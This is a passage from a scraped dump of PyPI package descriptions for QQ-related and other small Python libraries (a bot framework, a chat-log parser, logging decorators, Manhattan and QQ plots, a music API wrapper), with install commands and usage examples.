"botpy\u662f\u57fa\u4e8e\u673a\u5668\u4eba\u5f00\u653e\u5e73\u53f0API\u5b9e\u73b0\u7684\u673a\u5668\u4eba\u6846\u67b6\uff0c\u76ee\u7684\u63d0\u4f9b\u4e00\u4e2a\u6613\u4f7f\u7528\u3001\u5f00\u53d1\u6548\u7387\u9ad8\u7684\u5f00\u53d1\u6846\u67b6\u3002\u51c6\u5907\u5de5\u4f5c\u5b89\u88c5pipinstallqq-botpy\u66f4\u65b0\u5305\u7684\u8bdd\u9700\u8981\u6dfb\u52a0--upgrade\u6ce8\uff1a\u9700\u8981python3.7+\u4f7f\u7528\u9700\u8981\u4f7f\u7528\u7684\u5730\u65b9import 
botpyimportbotpy\u517c\u5bb9\u63d0\u793a\u539f\u673a\u5668\u4eba\u7684\u8001\u7248\u672cqq-bot\u4ecd\u7136\u53ef\u4ee5\u4f7f\u7528\uff0c\u4f46\u65b0\u63a5\u53e3\u7684\u652f\u6301\u4e0a\u4f1a\u9010\u6e10\u6682\u505c\uff0c\u6b64\u6b21\u5347\u7ea7\u4e0d\u4f1a\u5f71\u54cd\u7ebf\u4e0a\u4f7f\u7528\u7684\u673a\u5668\u4eba\u4f7f\u7528\u65b9\u5f0f\u5feb\u901f\u5165\u95e8\u6b65\u9aa41\u901a\u8fc7\u7ee7\u627f\u5b9e\u73b0bot.Client, \u5b9e\u73b0\u81ea\u5df1\u7684\u673a\u5668\u4ebaClient\u6b65\u9aa42\u5b9e\u73b0\u673a\u5668\u4eba\u76f8\u5173\u4e8b\u4ef6\u7684\u5904\u7406\u65b9\u6cd5,\u5982on_at_message_create\uff0c \u8be6\u7ec6\u7684\u4e8b\u4ef6\u76d1\u542c\u5217\u8868\uff0c\u8bf7\u53c2\u8003\u4e8b\u4ef6\u76d1\u542c.md\u5982\u4e0b\uff0c\u662f\u5b9a\u4e49\u673a\u5668\u4eba\u88ab@\u7684\u540e\u81ea\u52a8\u56de\u590d:importbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_ready(self):print(f\"robot \u300c{self.robot.name}\u300d on_ready!\")asyncdefon_at_message_create(self,message:Message):awaitmessage.reply(content=f\"\u673a\u5668\u4eba{self.robot.name}\u6536\u5230\u4f60\u7684@\u6d88\u606f\u4e86:{message.content}\")\u6ce8\u610f:\u6bcf\u4e2a\u4e8b\u4ef6\u4f1a\u4e0b\u53d1\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\uff0c\u5982`message`\u76f8\u5173\u4e8b\u4ef6\u662f`message.Message`\u7684\u5bf9\u8c61 (\u90e8\u5206\u4e8b\u4ef6\u900f\u4f20\u4e86\u540e\u53f0\u6570\u636e\uff0c\u6682\u672a\u5b9e\u73b0\u5bf9\u8c61\u7f13\u5b58)\u6b65\u9aa43\u8bbe\u7f6e\u673a\u5668\u4eba\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u9053\uff0c\u5e76\u542f\u52a8clientimportbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_at_message_create(self,message:Message):awaitself.api.post_message(channel_id=message.channel_id,content=\"content\")intents=botpy.Intents(public_guild_messages=True)client=MyClient(intents=intents)client.run(appid=\"12345\",token=\"xxxx\")\u5907\u6ce8\u4e5f\u53ef\u4ee5\u901a\u8fc7\u9884\u8bbe\u7f6e\u7684\u7c7b\u578b\uff0c\u8bbe\u7f6e\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u9053importbotpyintents=botpy.Intents.none()intents.public_guild_messages=True\u4f7f\u7528API\u5982\u679c\u8981\u4f7f\u7528api\u65b9\u6cd5\uff0c\u53ef\u4ee5\u53c2\u8003\u5982\u4e0b\u65b9\u5f0f:importbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_at_message_create(self,message:Message):awaitself.api.post_message(channel_id=message.channel_id,content=\"content\")\u793a\u4f8b\u673a\u5668\u4eba``examples`<./examples/>`_ \u76ee\u5f55\u4e0b\u5b58\u653e\u793a\u4f8b\u673a\u5668\u4eba\uff0c\u5177\u4f53\u4f7f\u7528\u53ef\u53c2\u8003``Readme.md`<./examples/README.md>`_examples/\n.\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 config.example.yaml # \u793a\u4f8b\u914d\u7f6e\u6587\u4ef6\uff08\u9700\u8981\u4fee\u6539\u4e3aconfig.yaml\uff09\n\u251c\u2500\u2500 demo_announce.py # \u673a\u5668\u4eba\u516c\u544aAPI\u4f7f\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_api_permission.py # \u673a\u5668\u4eba\u6388\u6743\u67e5\u8be2API\u4f7f\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dasync\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_ark.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dark\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_embed.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dembed\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_command.py # 
\u673a\u5668\u4ebaat\u88ab\u52a8\u4f7f\u7528Command\u6307\u4ee4\u88c5\u9970\u5668\u56de\u590d\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_file_data.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590d\u672c\u5730\u56fe\u7247\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_keyboard.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dmd\u5e26\u5185\u5d4c\u952e\u76d8\u7684\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_markdown.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dmd\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_reference.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590d\u6d88\u606f\u5f15\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_dms_reply.py # \u673a\u5668\u4eba\u79c1\u4fe1\u88ab\u52a8\u56de\u590d\u793a\u4f8b\n\u251c\u2500\u2500 demo_get_reaction_users.py # \u673a\u5668\u4eba\u83b7\u53d6\u8868\u60c5\u8868\u6001\u6210\u5458\u5217\u8868\u793a\u4f8b\n\u251c\u2500\u2500 demo_guild_member_event.py # \u673a\u5668\u4eba\u9891\u9053\u6210\u5458\u53d8\u5316\u4e8b\u4ef6\u793a\u4f8b\n\u251c\u2500\u2500 demo_interaction.py # \u673a\u5668\u4eba\u4e92\u52a8\u4e8b\u4ef6\u793a\u4f8b\uff08\u672a\u542f\u7528\uff09\n\u251c\u2500\u2500 demo_pins_message.py # \u673a\u5668\u4eba\u6d88\u606f\u7f6e\u9876\u793a\u4f8b\n\u251c\u2500\u2500 demo_recall.py # \u673a\u5668\u4eba\u6d88\u606f\u64a4\u56de\u793a\u4f8b\n\u251c\u2500\u2500 demo_schedule.py # \u673a\u5668\u4eba\u65e5\u7a0b\u76f8\u5173\u793a\u4f8b\u66f4\u591a\u529f\u80fd\u66f4\u591a\u529f\u80fd\u8bf7\u53c2\u8003: [https://github.com/tencent-connect/botpy]"} +{"package": "qq-chat-history", "pacakge-description": "QQ \u804a\u5929\u8bb0\u5f55\u63d0\u53d6\u5668\u7b80\u4ecb\u4ece QQ \u804a\u5929\u8bb0\u5f55\u6587\u4ef6\u4e2d\u63d0\u53d6\u804a\u5929\u4fe1\u606f\uff0c\u4ec5\u652f\u6301txt\u683c\u5f0f\u7684\u804a\u5929\u8bb0\u5f55\u3002\u5b89\u88c5\u4f7f\u7528pip\u5b89\u88c5\uff0c\u8981\u6c42Python 3.9\u6216\u4ee5\u4e0a\u7248\u672c\u3002>pipinstall-Uqq-chat-history\u4f7f\u7528\u6700\u7b80\u5355\u7684\u542f\u52a8\u65b9\u5f0f\u5982\u4e0b\uff0c\u5b83\u4f1a\u81ea\u52a8\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u521b\u5efaoutput.json\u8fdb\u884c\u8f93\u51fa\uff08\u5982\u679c\u5b89\u88c5\u5230\u865a\u62df\u73af\u5883\u8bf7\u786e\u4fdd\u5df2\u6fc0\u6d3b\uff09\u3002>qq-chat-history/path/to/file.txt\u542f\u52a8\u65f6\u8f93\u5165--help\u53c2\u6570\u67e5\u770b\u66f4\u591a\u914d\u7f6e\u9879\u3002>qq-chat-history--help\u6216\u8005\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u4e00\u4e2a\u7b2c\u4e09\u65b9\u5e93\u4f7f\u7528\uff0c\u5982\u4e0b\uff1aimportqq_chat_historylines='''=========\u5047\u88c5\u6211\u662f QQ \u81ea\u52a8\u751f\u6210\u7684\u6587\u4ef6\u5934=========1883-03-07 11:22:33 AText A1Text A21883-03-07 12:34:56 B(123123)Text B1883-03-07 13:24:36 C(456456)Text C1883-03-07 22:00:51 AText D'''.strip().splitlines()# \u8fd9\u91cc\u7684 lines \u4e5f\u53ef\u4ee5\u662f\u6587\u4ef6\u5bf9\u8c61\u6216\u8005\u4ee5\u5b57\u7b26\u4e32\u6216\u8005 Path 
\u5bf9\u8c61\u8868\u793a\u7684\u6587\u4ef6\u8def\u5f84\u3002formsginqq_chat_history.parse(lines):print(msg.date,msg.id,msg.name,msg.content)\u6ce8\u610fparse\u65b9\u6cd5\u8fd4\u56de\u7684\u662f\u4e00\u4e2aBody\u5bf9\u8c61\uff0c\u4e00\u822c\u4ee5Iterable[Message]\u7684\u5f62\u5f0f\u4f7f\u7528\u3002\u5f53\u7136Body\u4e5f\u63d0\u4f9b\u4e86\u51e0\u4e2a\u51fd\u6570\uff0c\u867d\u7136\u4e00\u822c\u4e5f\u6ca1\u4ec0\u4e48\u7528\u3002Tips\u5982\u679c\u5f53\u4f5c\u4e00\u4e2a\u7b2c\u4e09\u65b9\u5e93\u6765\u7528\uff0c\u4f8b\u5982find_xxx\u65b9\u6cd5\uff0c\u53ef\u4ee5\u4ece\u6570\u636e\u4e2d\u67e5\u627e\u6307\u5b9aid\u6216name\u7684\u6d88\u606f\uff1bsave\u65b9\u6cd5\u53ef\u4ee5\u5c06\u6570\u636e\u4ee5yaml\u6216json\u683c\u5f0f\u4fdd\u5b58\u5230\u6587\u4ef6\u4e2d\uff0c\u867d\u7136\u8fd9\u4e2a\u5de5\u4f5c\u4e00\u822c\u90fd\u76f4\u63a5\u4ee5CLI\u6a21\u5f0f\u542f\u52a8\u6765\u5b8c\u6210\u3002\u51fd\u6570parse\u53ef\u4ee5\u5904\u7406\u591a\u6837\u7684\u7c7b\u578b\u3002Iterable[str]\uff1a\u8fed\u4ee3\u6bcf\u884c\u7684\u53ef\u8fed\u4ee3\u5bf9\u8c61\uff0c\u5982list\u6216tuple\u7b49\u3002TextIOBase\uff1a\u6587\u672c\u6587\u4ef6\u5bf9\u8c61\uff0c\u5982\u7528open\u6253\u5f00\u7684\u6587\u672c\u6587\u4ef6\uff0c\u6216\u8005io.StringIO\u90fd\u5c5e\u4e8e\u6587\u672c\u6587\u4ef6\u5bf9\u8c61\u3002str,Path\uff1a\u6587\u4ef6\u8def\u5f84\uff0c\u5982./data.txt\u3002\u8fd9\u4e9b\u53c2\u6570\u90fd\u5c06\u4ee5\u5bf9\u5e94\u7684\u65b9\u6cd5\u6765\u6784\u9020Body\u5bf9\u8c61\u3002"} +{"package": "qqddm", "pacakge-description": "QQ's \"Different Dimension Me\" Animefier Python libraryPython wrapper forQQ's \"Different Dimension Me\" AIAPI, that applies an anime-theme to any given picture.InstallingThis package was developed & tested under Python 3.9. Available onPyPI:pipinstall--userqqddmUsageCheck theexamplecode.Known issues and limitations of the APIOnly pictures with human faces: since 2022-12-06, the QQ's API became stricter with the pictures being converted, and requires them to have a human face.Forbidden images: the QQ's API refuses to convert images with sensible or political content.ChangelogVersions 0.y.z are expected to be unstable, and the library API may change on Minor (y) releases.0.1.1Update to the new \"overseas\" API, which can be used from outside ChinaFix how images are downloaded using threads0.0.3Add new custom exceptionParamInvalidQQDDMApiResponseExceptionRefactor mapping of API response codes with custom exceptions, now done programatically, defining the corresponding response code on each exception class0.0.2Add newx-signheaders required by the API since 2022-12-06.Add new custom exceptions based on errors returned by the API:VolumnLimitQQDDMApiResponseException,AuthFailedQQDDMApiResponseException,NotAllowedCountryQQDDMApiResponseException,NoFaceInPictureQQDDMApiResponseException.0.0.1Initial release:Class-based interface.Pass an image (as bytes) and send it to QQ API, returning the resulting images URLs.Download the returned images URLs.Requests settings (different for QQ API and for downloading result images): request timeouts, proxy, user-agents."} +{"package": "qqdm", "pacakge-description": "qqdmA lightweight, fast and pretty progress bar for PythonDemoInstallationpip install qqdmUsageThe following is a simple example.importtimeimportrandomfromqqdmimportqqdm,format_strtw=qqdm(range(10),desc=format_str('bold','Description'))foriintw:loss=random.random()acc=random.random()tw.set_infos({'loss':f'{loss:.4f}','acc':f'{acc:.4f}',})time.sleep(0.5)For the demo gif shown above, you may refer totests/test.py."} 
+{"package": "qqg", "pacakge-description": "qqgA small CLI search tool.Installationpipx install qqgUsagesearch \"search terms\""} +{"package": "qqhrz", "pacakge-description": "qqhrz\u5bf9\u52a8\u624b\u5b66\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u548c\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b01. \u7b80\u4ecb\u8fd9\u4e2a\u5305\u662f\u5bf9\u52a8\u624b\u5b66\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u548c\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b0\uff0c\u7531\u672c\u4eba\u4e66\u5199\uff0c\u5b58\u5728\u7740\u8bb8\u591a\u4e0d\u8db3\uff0c\u5e0c\u671b\u5927\u5bb6\u89c1\u8c05\u3002\u5199\u8fd9\u4e2a\u5305\u65e2\u662f\u5bf9\u81ea\u5df1\u7684\u7ec3\u4e60\uff0c\u4e5f\u662f\u5e0c\u671b\u53ef\u4ee5\u7ed9\u540c\u7ec4\u5e08\u5f1f\u3001\u5e08\u59b9\u4eec\u4e00\u4e9b\u5e2e\u52a9\u30022. \u5305\u7684\u7ed3\u6784qqhrz\u5305\u4e2d\u5305\u542b\u4e24\u4e2a\u6a21\u5757\uff1aztorch\u548czgnn2.1 ztorch\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u3002\u53ef\u4ee5\u901a\u8fc7\u201dfrom qqhrz import ztorch as qz\u201c\u8fdb\u884c\u8c03\u7528\u30022.2 zgnn\u5bf9\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b0\u3002\u53ef\u4ee5\u901a\u8fc7\u201dfrom qqhrz import zgnn as zg\u201c\u8fdb\u884c\u8c03\u7528\u30023. \u4f9d\u8d56\u4f7f\u7528\u672c\u5305\u65f6\uff0c\u9700\u8981\u5148\u5b89\u88c5pytorch==1.12.0\u548ctorchvision==0.13.0\uff0ccpu\u7248\u548cgpu\u7248\u5747\u53ef\uff0c\u5efa\u8bae\u5b89\u88c5gpu\u7248\u672c\u30024. \u7248\u672c\u66f4\u65b00.0.7\uff1a\u52a0\u5165Transformer\u6a21\u578b\u548cBERT\u6a21\u578b\u4ee5\u53caBERT\u6a21\u5f0f\u8f93\u5165\u6570\u636e\u7684\u5904\u7406\u30020.0.8\uff1a\u89e3\u51b3\u4e86\u8fd0\u884c\u901f\u5ea6\u6162\u7684\u95ee\u9898\uff0c\u539f\u56e0\u662f\u5176\u4e2d\u6709\u4e9b\u5f20\u91cf\u662f\u5728cpu\u4e0a\u7684\uff0c\u5bfc\u81f4\u5728cpu\u4e0a\u8ba1\u7b97\uff0c\u901f\u5ea6\u6162\u30020.1.0\uff1a\u52a0\u5165zgnn\u6a21\u5757\uff0c\u5305\u542b\u5bf9\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u5b9e\u73b0\u30020.1.1\uff1a\u52a0\u5165GCN\u30020.1.2\uff1a\u52a0\u5165GraphSAGE\u30020.1.3\uff1a\u7ed9Transformer\u7f16\u7801\u5668\u548c\u89e3\u7801\u5668\u589e\u52a0max_len\u53c2\u6570\uff0c\u5373\u5e8f\u5217\u6700\u5927\u957f\u5ea6\u30020.1.4: \u52a0\u5165\u8bcd\u8868\uff0c\u4fee\u590d\u4e00\u4e9b\u95ee\u9898\u30020.1.5: \u4fee\u590d\u4e86\u4e00\u4e9b\u95ee\u9898\u30020.1.6: \u4fee\u590d\u4e86\u751f\u6210bert\u8f93\u5165\u6570\u636e\u4e2d\u5b58\u5728\u7684\u4e00\u4e9b\u95ee\u9898\u30020.1.7: \u4fee\u590d\u4e86\u751f\u6210bert\u8f93\u5165\u6570\u636esegment\u4e2d\u5b58\u5728\u7684\u4e00\u4e9b\u95ee\u9898\u30025. \u5e0c\u7ffc\u5e0c\u671b\u81ea\u5df1\u80fd\u591f\u4e0d\u65ad\u5b8c\u5584\uff0c\u4e0d\u65ad\u6539\u8fdb\u4ee3\u7801\uff0c\u63d0\u5347\u81ea\u5df1\u7684\u80fd\u529b\uff0c\u7ed9\u5927\u5bb6\u4e00\u4e9b\u5e2e\u52a9\u3002"} +{"package": "qqhr-z-torch", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qqlib", "pacakge-description": "QQ library for Python, based on web APIs."} +{"package": "qqlog", "pacakge-description": "qqlog installpipinstallqqlogqqlog example 1fromqqlogimportex,init,enterleave,traceinit()#init(path='./log/qqlog.log',level=logging.DEBUG)@ex()deftest1(a,b):returna/b@enterleave()deftest2(a,b):returna/b@trace()deftest3(a,b):returna/b@enterleave()deftest4(a,b,prefix='answer is'):val=a/bprint('%s%s'%(prefix,str(val)))returnvalclasstestclass(object):@enterleave()def__init__(self):print('init')@enterleave()defsum(self,a,b):returna+bimportpandasaspddf=pd.DataFrame(data={'1':[1,2,3],'b':['test1','test2','test3']},index=range(3))@enterleave()defdf_test(a,b,df):val=a+b+df['1'].sum()returnvalimportnumpyasnpd=np.array([[1,2,3],[4,5,6]])@enterleave()defnp_test(a,b,d):val=a+b+d.sum()returnvalimportlogginglogging.getLogger('newlogger')@enterleave(loggername='newlogger',level=logging.ERROR)defnew_logger_test(a,b):returna+btry:test1(1,0)test2(1,1)test3(1,0)test4(1,2,prefix='result:')df_test(1,2,df)np_test(1,2,d)testclass().sum(10,20)new_logger_test(5,15)exceptExceptionasex:print(ex)Console/qqlog.log2021-09-29 21:47:47 [ERROR] [MainThread] [RAISE]test1: division by zero2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]test2(0:int=1, 1:int=1)2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]test2(1.0)2021-09-29 21:47:47 [ERROR] [MainThread] [RAISE]test3TRACE STARTTraceback (most recent call last):File \"E:\\jupyter\\projects\\whl\\qqlog\\qqlog_init_.py\", line 174, in func_warpreturn_val = func(*args, **kwargs)File \"E:\\jupyter\\projects\\whl\\qqlog\\example.py\", line 15, in test3return a/bZeroDivisionError: division by zeroTRACE END2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]test4(0:int=1, 1:int=2, prefix:str='result:')result: 0.52021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]test4(0.5)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]df_test(0:int=1, 1:int=2, 2:DataFrame=[3bb56549-ebe7-4a85-900f-50d8788d29d3.csv])\n2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]df_test(9)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]np_test(0:int=1, 1:int=2, 2:ndarray=[367eb5ed-73f8-45e8-8fcb-4d8781afc46a.ary])2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]np_test(24)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]init()init2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]init(None)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]sum(0:int=10, 1:int=20)2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]sum(30)[ENTER]new_logger_test(0:int=5, 1:int=15)[RETURN]new_logger_test(20)# qqlog example 2\n```python\nfrom qqlog import ex,init,createCsvFileLogger,createConsoleFileLogger\nimport logging\ninit()\n\ncreateCsvFileLogger('csv',level=logging.DEBUG,headers=['asctime','funcName','levelname','msg'],formatters=['asctime','funcName','levelname','msg'],path='debug.csv')\ncreateConsoleFileLogger('consolefile',level=logging.DEBUG,path='./consolefile.log')\n\n@ex(loggername='csv',rethrow=False)\ndef test_csv(a,b):\n return a/b\n\n@ex(loggername='consolefile',rethrow=False)\ndef test_consolefile(a,b):\n return a/b\n\ntry:\n test_csv(1,0)\n test_consolefile(1,0)\nexcept Exception as ex:\n print(ex)asctime,funcName,levelname,msg\n\"2021-10-23 21:32:26\",\"func_warp\",\"ERROR\",\"[RAISE]test_csv: division by zero\"2021-10-23 21:32:26,407 [RAISE]test_consolefile: division by zero"} +{"package": "qqmail", "pacakge-description": "No description available on PyPI."} +{"package": "qq-mail", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qqman", "pacakge-description": "qqman for PythonIf you want to check out the source code or have any issues please leave a comment at mygithubrepository.This library is inspired by r-qqman (seehere).It also contains/will contain other methods for python users.ContentsIntroduction1.1.Installation1.2.Requirements1.3.FeaturesManhattan Plot2.1.Parameters2.2.ExamplesQQ Plot3.1.Parameters3.2.Examples1. Introduction1.1. InstallationUsing pip$pipinstallqqman1.2. Requirementsmatplotlibpandasnumpypip$pipinstallnumpy$pipinstallpandas$pipinstallmatplotlibananconda$condainstall-canacondanumpy$condainstall-y-canacondapandas$condainstall-y-cconda-forgematplotlib1.3. FeaturesManhattan PlotQQ Plot2. Manhattan PlotDraws Manhattan plot from PLINK --assoc output or any assoc formatted data that contains [chromosome/basepair/p-value] as columns.2.1. Parametersassoc: string or pandas.DataFrame- Input file path and name of the Plink assoc output.- Pandas DataFrame with columns [chromosome/basepair/p-value]out: string( optional )Output path and file name of the plot. (ie. out=\"./Manhattan.png\")cmap: Colormap( optional : default=Greys_r )A Colormap instance or registered colormap name. matplotlib.cm.get_cmap()cmap_var: int or list( optional : default=2 )int : Number of colors to uselist : Specific colors to use in colormapshow: bool( optional )If true, the plot will be shown on your screen. (This option doesn't work in CUI environment.)gap: float( optional : default=10)A size of gaps between the group of scatter markers of each chromosome in Manhattan plotax: subplot( optional )If given, this subplot is used to plot in instead of a new figure being created.title: string( optional )A title of the plot.title_size: int( optional )A size of the title of the plot.label_size: int( optional )A size of x and y labels of the plot.xtick_size: int( optional )A size of xtick labels.ytick_size: int( optional )A size of ytick labels.xrotation: float( optional )A rotation degree of xtick labels.yrotation: float( optional )A rotation degree of ytick labels.col_chr: string( optional : default=\"CHR\" )A string denoting the column name for the chromosome. Defaults to PLINK\u2019s \"CHR\" Said column must be numeric.If you have X, Y, or MT chromosomes, be sure to renumber these 23, 24, 25, etc.col_bp: string( optional : default=\"BP\" )A string denoting the column name for the chromosomal position. Defaults to PLINK\u2019s \"BP\" Said column must be numeric.col_p: string( optional : default=\"P\" )A string denoting the column name for the p-value. Defaults to PLINK\u2019s \"P\" Said column must be numeric.col_snp: string( optional : default=\"SNP\" )A string denoting the column name for the SNP name (rs number). Defaults to PLINK\u2019s \"SNP\" Said column should be a charactersuggestiveline: string( optional : default=-log_10(1e-5) )Where to draw a \"suggestive\" line. Set to False to disable.genomewideline: string( optional : default=-log_10(5e-8) )Where to draw a \"genome-wide sigificant\" line. Set to False to disable.2.2. Examples2.2.1. Simplefromqqmanimportqqmanif__name__==\"__main__\":qqman.manhattan(\"../../temp.assoc\",out=\"./Manhattan.png\")2.2.2. 
Using Subplotfromqqmanimportqqmanimportpandasaspdimportmatplotlib.pyplotaspltif__name__==\"__main__\":df_assoc=pd.read_csv(\"../../temp.assoc\",header=0,delim_whitespace=True)figure,axes=plt.subplots(nrows=2,ncols=2,figsize=(20,20))qqman.manhattan(\"../../temp.assoc\",ax=axes[0,0],title=\"Wider gap 100\",gap=100)qqman.manhattan(\"../../temp.assoc\",ax=axes[0,1],title=\"No lines\",suggestiveline=False,genomewideline=False)qqman.manhattan(\"../../temp.assoc\",ax=axes[1,0],title=\"Different colormap\",cmap=plt.get_cmap(\"jet\"),cmap_var=10)qqman.manhattan(df_assoc,ax=axes[1,1],title=\"From DataFrame with xtick rotation\",xrotation=45)figure.tight_layout()plt.savefig(\"./manhattan.png\",format=\"png\")plt.clf()plt.close()3. QQ PlotDraws a quantile-quantile plot from p-values of GWAS.3.1. Parametersassoctypes: [string, pandas.DataFrame, numpy.array, list]- Input file path and name of the Plink assoc output.- Pandas DataFrame with columns [chromosome/basepair/p-value]out: string( optional )Output path and file name of the plot. (ie. out=\"./Manhattan.png\")show: bool( optional )If true, the plot will be shown on your screen. (This option doesn't work in CUI environment.)ax: subplot( optional )If given, this subplot is used to plot in instead of a new figure being created.title: string( optional )A title of the plot.title_size: int( optional )A size of the title of the plot.label_size: int( optional )A size of x and y labels of the plot.xtick_size: int( optional )A size of xtick labels.ytick_size: int( optional )A size of ytick labels.xrotation: float( optional )A rotation degree of xtick labels.yrotation: float( optional )A rotation degree of ytick labels.col_p: string( optional : default=\"P\" )A string denoting the column name for the p-value. Defaults to PLINK\u2019s \"P\" Said column must be numeric.3.2. Examples3.2.1. Simplefromqqmanimportqqmanif__name__==\"__main__\":qqman.qqplot(\"../../temp.assoc\",out=\"./QQplot.png\")3.2.2. 
Using Subplotfromqqmanimportqqmanimportpandasaspdimportmatplotlib.pyplotaspltif__name__==\"__main__\":df_assoc=pd.read_csv(\"../../temp.assoc\",header=0,delim_whitespace=True)p_vals=list(df_assoc['P'])figure,axes=plt.subplots(nrows=2,ncols=2,figsize=(20,20))qqman.qqplot(\"../../temp.assoc\",ax=axes[0,0],title=\"From file\")qqman.qqplot(p_vals,ax=axes[0,1],title=\"From list\")qqman.qqplot(df_assoc.P,ax=axes[1,0],title=\"From Series\")qqman.qqplot(df_assoc,ax=axes[1,1],title=\"From DataFrame\")figure.tight_layout()plt.savefig(\"./SubQQplot.png\",format=\"png\")plt.clf()plt.close()"} +{"package": "qqmusic-api", "pacakge-description": "QQMusicAPI\u652f\u6301\u7684\u7248\u672c\u672c\u9879\u76ee\u4f7f\u7528 python 3.6.7 \u8fdb\u884c\u5f00\u53d1\uff0c\u4ec5\u4fdd\u8bc1\u5728\u8be5\u7248\u672c\u4e0a\u53ef\u4ee5\u8fd0\u884c\u3002\u4ee5\u4e0b\u662f\u7ecf\u6d4b\u8bd5\u4e5f\u53ef\u4ee5\u4f7f\u7528\u7684\u7248\u672c\uff08\u4f46\u4e0d\u4fdd\u8bc1\u6240\u6709\u529f\u80fd\u6b63\u5e38\u53ef\u7528\uff09\uff1apython 2.6+python 3.5+\u6ce8\u610f\uff1a\u56e0\u4e3a\u5bf9\u5b57\u7b26\u4e32\u7684\u5904\u7406\u65b9\u5f0f\u4e0d\u540c\uff0c\u5728 Python2 \u4e2d\uff0c\u6240\u6709\u7c7b\u7684__repr__\u65b9\u6cd5\u4e0e__str__\u65b9\u6cd5\u5c06\u4e0d\u53ef\u7528\u3002\u652f\u6301\u7684\u5e73\u53f0\u672c\u9879\u76ee\u4f7f\u7528 Ubuntu 18.04 \u8fdb\u884c\u5f00\u53d1\uff0c\u4ec5\u4fdd\u8bc1\u5728\u8be5\u5e73\u53f0\u4e0a\u53ef\u7528\u3002\u9879\u76ee\u6ca1\u6709\u5e73\u53f0\u76f8\u5173\u7684\u4f9d\u8d56\uff0c\u7406\u8bba\u4e0a\u53ef\u4ee5\u5728\u4efb\u4f55\u53ef\u4ee5\u4f7f\u7528 Python \u7684\u5e73\u53f0\u4e0a\u8fd0\u884c\u3002UsageSongSearchPager>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')# \u6211\u6700\u559c\u6b22\u7684\u662f\u5b66\u59d0\u7248\u7684(\u8305\u91ce\u611b\u8863)>>>type(music_list)>>>music_list.data[, , , , , , , , , , , , , ,,,,,,]>>>music_list.page_size2>>>music_list.total_num39>>>music_list.keyword'\u5c4a\u304b\u306a\u3044\u604b'>>>music_list.cursor_page1>>>next_music_list=music_list.next_page()>>>next_music_list.cursor_page2>>>prev_music_list=next_music_list.prev_page()>>>prev_music_list.cursor_page1Song>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>type(song)>>>song.song_mid'0044XSxC3rZYir'>>>song.url'https://y.qq.com/n/yqq/song/0044XSxC3rZYir.html'>>>song.name\"\u5c4a\u304b\u306a\u3044\u604b '13\">>>song.title\"\u5c4a\u304b\u306a\u3044\u604b '13 (\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13)\">>>song.singer[]>>>song.song_url()'http://dl.stream.qqmusic.qq.com/C4000044XSxC3rZYir.m4a?vkey=0E9DBFC4D180A631CD62ED0784E3DFA450F3B21148A4A9BD5C8E916B6EFDEF2C7A3EA45067C288890EC1D40F6603C9545FE65E49D53D2BC4&guid=8388983860&fromtag=30'>>>importrequests# \u751f\u6210\u7684\u94fe\u63a5\u53ef\u4ee5\u4f7f\u7528 requests 